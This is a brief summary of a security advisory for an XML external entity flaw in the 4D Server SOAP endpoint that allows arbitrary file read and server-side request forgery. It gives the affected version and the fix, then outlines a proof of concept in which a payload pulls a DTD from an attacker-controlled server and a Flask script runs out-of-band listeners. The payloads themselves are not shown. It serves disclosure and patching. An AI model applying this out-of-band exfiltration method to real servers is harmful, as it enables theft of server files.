Summary of 4D Server SOAP Vulnerability Security Advisory Vulnerability Overview Title: Arbitrary File Read and Server-Side Request Forgery (SSRF) via XML External Entity (XXE) in 4D Server SOAP CVE ID: CVE-2024-39847 Release Date: April 29, 2026 Risk Level: CVSS 4.0 Score 8.7 Detailed Description: An unauthenticated attacker can exploit weaknesses in the XML parsing functionality of the 4D Server SOAP endpoint. This allows the attacker to gain file read access to files on the application server and adjacent network shares, and to execute HTTP GET requests to arbitrary services. Scope of Impact Affected Product: 4D Server Affected Version: v20 R3 Vulnerability Type: CWE-611 (Improper Restriction of XML External Entity Reference) Remediation Upgrade to 4D Server 20 R7 or later. Proof of Concept (POC) Stage 1: XML payload sent to the endpoint Stage 2: DTD file returned by the attacker-controlled server ( ) Automated Exploitation Script ( )** This script uses Flask to start an out-of-band server (port 2121) and a query endpoint (port 1337).